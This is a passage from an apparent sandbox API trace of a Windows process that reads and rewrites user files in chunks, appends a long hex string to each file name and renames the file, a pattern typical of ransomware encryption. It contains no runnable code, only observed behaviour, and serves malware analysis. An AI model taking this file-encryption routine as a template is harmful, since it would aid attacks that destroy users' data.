lpOverlapped=0x75f0050 | out: lpBuffer=0x7610188*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75f0050) returned 1 [0165.884] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.894] ReadFile (in: hFile=0x590, lpBuffer=0x76382e0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x76181a8 | out: lpBuffer=0x76382e0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x76181a8) returned 1 [0165.894] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.895] WriteFile (in: hFile=0x590, lpBuffer=0x76382e0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76181a8 | out: lpBuffer=0x76382e0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76181a8) returned 1 [0165.896] RtlInterlockedCompareExchange64 () returned 0x2 [0165.896] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.896] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x7618258, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x7618258, ReturnLength=0x708f9e4) returned 0x0 [0165.898] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\0W_eZ.png", lpString2=".6F190DB49F6E357CD6E6E0D4CDC551425F933C61112BDD0A128E45B45D191F7F" | out: 
lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\0W_eZ.png.6F190DB49F6E357CD6E6E0D4CDC551425F933C61112BDD0A128E45B45D191F7F") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\0W_eZ.png.6F190DB49F6E357CD6E6E0D4CDC551425F933C61112BDD0A128E45B45D191F7F" [0165.898] GetProcessHeap () returned 0x270000 [0165.898] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x118) returned 0x4276c18 [0165.898] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x708f9d4, FileInformation=0x4276c18, Length=0x118, FileInformationClass=0xa) returned 0x0 [0165.900] CloseHandle (hObject=0x590) returned 1 [0165.902] GetProcessHeap () returned 0x270000 [0165.903] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76181a8 | out: hHeap=0x270000) returned 1 [0165.903] RtlInterlockedCompareExchange64 () returned 0x3 [0165.903] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.908] ReadFile (in: hFile=0x590, lpBuffer=0x76382e0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x76181a8 | out: lpBuffer=0x76382e0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x76181a8) returned 1 [0165.909] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.910] WriteFile (in: hFile=0x590, lpBuffer=0x76382e0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76181a8 | out: lpBuffer=0x76382e0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76181a8) returned 1 [0165.911] RtlInterlockedCompareExchange64 () returned 0x2 [0165.911] GetQueuedCompletionStatus (in: 
CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.911] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x7618258, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x7618258, ReturnLength=0x708f9e4) returned 0x0 [0165.912] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\fCOxneQ.ods", lpString2=".28E9B4F881131ABCFBA23DD6244A0EE710A5A68570B129D6ADA5761D01592D17" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\fCOxneQ.ods.28E9B4F881131ABCFBA23DD6244A0EE710A5A68570B129D6ADA5761D01592D17") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\fCOxneQ.ods.28E9B4F881131ABCFBA23DD6244A0EE710A5A68570B129D6ADA5761D01592D17" [0165.912] GetProcessHeap () returned 0x270000 [0165.912] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11c) returned 0x4276d40 [0165.913] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x708f9d4, FileInformation=0x4276d40, Length=0x11c, FileInformationClass=0xa) returned 0x0 [0165.914] CloseHandle (hObject=0x590) returned 1 [0165.915] GetProcessHeap () returned 0x270000 [0165.917] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76181a8 | out: hHeap=0x270000) returned 1 [0165.917] RtlInterlockedCompareExchange64 () returned 0x3 [0165.917] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.923] ReadFile (in: hFile=0x590, lpBuffer=0x76382e0, nNumberOfBytesToRead=0x1c00, lpNumberOfBytesRead=0x0, lpOverlapped=0x76181a8 | out: lpBuffer=0x76382e0*, 
lpNumberOfBytesRead=0x0, lpOverlapped=0x76181a8) returned 1 [0165.924] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.924] WriteFile (in: hFile=0x590, lpBuffer=0x76382e0*, nNumberOfBytesToWrite=0x1c00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76181a8 | out: lpBuffer=0x76382e0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76181a8) returned 1 [0165.925] RtlInterlockedCompareExchange64 () returned 0x2 [0165.925] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.925] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x7618258, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x7618258, ReturnLength=0x708f9e4) returned 0x0 [0165.926] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\oHGOlTifeSET7B2 HWLe.flv", lpString2=".69A613596AA422F380B86EF11509C43E389604D41051F4DF51259CC789BFE50B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\oHGOlTifeSET7B2 HWLe.flv.69A613596AA422F380B86EF11509C43E389604D41051F4DF51259CC789BFE50B") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\oHGOlTifeSET7B2 HWLe.flv.69A613596AA422F380B86EF11509C43E389604D41051F4DF51259CC789BFE50B" [0165.927] GetProcessHeap () returned 0x270000 [0165.927] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x136) returned 0x4263070 [0165.927] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x708f9d4, FileInformation=0x4263070, Length=0x136, FileInformationClass=0xa) returned 0x0 
[0165.938] CloseHandle (hObject=0x590) returned 1 [0165.939] GetProcessHeap () returned 0x270000 [0165.941] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76181a8 | out: hHeap=0x270000) returned 1 [0165.941] RtlInterlockedCompareExchange64 () returned 0x3 [0165.941] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.942] NtQueryObject (in: Handle=0x304, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x7422118, ReturnLength=0x708f9e4) returned 0x0 [0165.943] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\ZUHdN4Zd.m4a", lpString2=".C4E75180B7201C50EFA4E48DD8EBD22A8DAA5E66265EA821106D149F02EC196D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\ZUHdN4Zd.m4a.C4E75180B7201C50EFA4E48DD8EBD22A8DAA5E66265EA821106D149F02EC196D") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\ZUHdN4Zd.m4a.C4E75180B7201C50EFA4E48DD8EBD22A8DAA5E66265EA821106D149F02EC196D" [0165.943] GetProcessHeap () returned 0x270000 [0165.943] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11e) returned 0x4276e68 [0165.943] NtSetInformationFile (FileHandle=0x304, IoStatusBlock=0x708f9d4, FileInformation=0x4276e68, Length=0x11e, FileInformationClass=0xa) returned 0x0 [0165.945] CloseHandle (hObject=0x304) returned 1 [0165.950] GetProcessHeap () returned 0x270000 [0165.951] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0165.951] RtlInterlockedCompareExchange64 () returned 0x2 [0165.951] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, 
dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.211] ReadFile (in: hFile=0x304, lpBuffer=0x7492450, nNumberOfBytesToRead=0x4c00, lpNumberOfBytesRead=0x0, lpOverlapped=0x7472318 | out: lpBuffer=0x7492450*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7472318) returned 1 [0168.212] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.212] ReadFile (in: hFile=0x5e0, lpBuffer=0x7660438, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7640300 | out: lpBuffer=0x7660438*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7640300) returned 1 [0168.212] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.212] ReadFile (in: hFile=0x5dc, lpBuffer=0x752a2a8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x750a170 | out: lpBuffer=0x752a2a8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x750a170) returned 1 [0168.213] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.213] ReadFile (in: hFile=0x5d8, lpBuffer=0x7552400, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x0, lpOverlapped=0x75322c8 | out: lpBuffer=0x7552400*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75322c8) returned 1 [0168.213] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, 
lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.214] ReadFile (in: hFile=0x5d4, lpBuffer=0x757a558, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x755a420 | out: lpBuffer=0x757a558*, lpNumberOfBytesRead=0x0, lpOverlapped=0x755a420) returned 1 [0168.214] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.214] ReadFile (in: hFile=0x5d0, lpBuffer=0x75a26b0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7582578 | out: lpBuffer=0x75a26b0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7582578) returned 1 [0168.216] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.216] ReadFile (in: hFile=0x5cc, lpBuffer=0x75ca808, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x75aa6d0 | out: lpBuffer=0x75ca808*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75aa6d0) returned 1 [0168.216] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.216] ReadFile (in: hFile=0x5c8, lpBuffer=0x76d9030, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x76b8ef8 | out: lpBuffer=0x76d9030*, lpNumberOfBytesRead=0x0, lpOverlapped=0x76b8ef8) returned 1 [0168.217] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, 
lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.217] ReadFile (in: hFile=0x5c4, lpBuffer=0x7701188, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x76e1050 | out: lpBuffer=0x7701188*, lpNumberOfBytesRead=0x0, lpOverlapped=0x76e1050) returned 1 [0168.217] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.218] ReadFile (in: hFile=0x5a8, lpBuffer=0x77292e0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x77091a8 | out: lpBuffer=0x77292e0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x77091a8) returned 1 [0168.218] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.218] ReadFile (in: hFile=0x594, lpBuffer=0x7751438, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7731300 | out: lpBuffer=0x7751438*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7731300) returned 1 [0168.219] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.219] ReadFile (in: hFile=0x4a8, lpBuffer=0x7779590, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7759458 | out: lpBuffer=0x7779590*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7759458) returned 1 [0168.219] 
GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.220] WriteFile (in: hFile=0x304, lpBuffer=0x7492450*, nNumberOfBytesToWrite=0x4c00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7472318 | out: lpBuffer=0x7492450*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7472318) returned 1 [0168.222] RtlInterlockedCompareExchange64 () returned 0x0 [0168.222] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.222] WriteFile (in: hFile=0x5e0, lpBuffer=0x7660438*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7640300 | out: lpBuffer=0x7660438*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7640300) returned 1 [0168.223] RtlInterlockedCompareExchange64 () returned 0x1 [0168.223] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.223] WriteFile (in: hFile=0x5dc, lpBuffer=0x752a2a8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x750a170 | out: lpBuffer=0x752a2a8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x750a170) returned 1 [0168.225] RtlInterlockedCompareExchange64 () returned 0x2 [0168.225] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) 
returned 1 [0168.225] WriteFile (in: hFile=0x5d8, lpBuffer=0x7552400*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75322c8 | out: lpBuffer=0x7552400*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75322c8) returned 1 [0168.226] RtlInterlockedCompareExchange64 () returned 0x3 [0168.226] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.227] WriteFile (in: hFile=0x5d4, lpBuffer=0x757a558*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x755a420 | out: lpBuffer=0x757a558*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x755a420) returned 1 [0168.228] RtlInterlockedCompareExchange64 () returned 0x4 [0168.228] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.228] WriteFile (in: hFile=0x5d0, lpBuffer=0x75a26b0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7582578 | out: lpBuffer=0x75a26b0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7582578) returned 1 [0168.229] RtlInterlockedCompareExchange64 () returned 0x5 [0168.229] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.229] WriteFile (in: hFile=0x5cc, lpBuffer=0x75ca808*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75aa6d0 | out: lpBuffer=0x75ca808*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75aa6d0) returned 1 [0168.232] 
RtlInterlockedCompareExchange64 () returned 0x6 [0168.232] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.232] WriteFile (in: hFile=0x5c8, lpBuffer=0x76d9030*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76b8ef8 | out: lpBuffer=0x76d9030*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76b8ef8) returned 1 [0168.233] RtlInterlockedCompareExchange64 () returned 0x7 [0168.233] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.233] WriteFile (in: hFile=0x5c4, lpBuffer=0x7701188*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76e1050 | out: lpBuffer=0x7701188*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76e1050) returned 1 [0168.235] RtlInterlockedCompareExchange64 () returned 0x8 [0168.235] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.235] WriteFile (in: hFile=0x5a8, lpBuffer=0x77292e0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x77091a8 | out: lpBuffer=0x77292e0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x77091a8) returned 1 [0168.237] RtlInterlockedCompareExchange64 () returned 0x9 [0168.237] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: 
lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.237] WriteFile (in: hFile=0x594, lpBuffer=0x7751438*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7731300 | out: lpBuffer=0x7751438*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7731300) returned 1 [0168.238] RtlInterlockedCompareExchange64 () returned 0xa [0168.239] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.239] WriteFile (in: hFile=0x4a8, lpBuffer=0x7779590*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7759458 | out: lpBuffer=0x7779590*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7759458) returned 1 [0168.240] RtlInterlockedCompareExchange64 () returned 0xb [0168.240] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.240] NtQueryObject (in: Handle=0x304, ObjectInformationClass=0x1, ObjectInformation=0x74723c8, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x74723c8, ReturnLength=0x708f9e4) returned 0x0 [0168.241] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\-qapdyt.gif", lpString2=".5FC2E595C273A69C2BC3DE010CCA665EC17C10C22C5E70A7F5B924F40359FE25" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\-qapdyt.gif.5FC2E595C273A69C2BC3DE010CCA665EC17C10C22C5E70A7F5B924F40359FE25") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\-qapdyt.gif.5FC2E595C273A69C2BC3DE010CCA665EC17C10C22C5E70A7F5B924F40359FE25" [0168.241] GetProcessHeap () 
returned 0x270000 [0168.241] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10e) returned 0x4267b70 [0168.241] NtSetInformationFile (FileHandle=0x304, IoStatusBlock=0x708f9d4, FileInformation=0x4267b70, Length=0x10e, FileInformationClass=0xa) returned 0x0 [0168.243] CloseHandle (hObject=0x304) returned 1 [0168.244] GetProcessHeap () returned 0x270000 [0168.245] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7472318 | out: hHeap=0x270000) returned 1 [0168.245] RtlInterlockedCompareExchange64 () returned 0xc [0168.245] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.246] NtQueryObject (in: Handle=0x5e0, ObjectInformationClass=0x1, ObjectInformation=0x76403b0, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x76403b0, ReturnLength=0x708f9e4) returned 0x0 [0168.247] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\1ZWvVhvziyMt_nXcJ.gif", 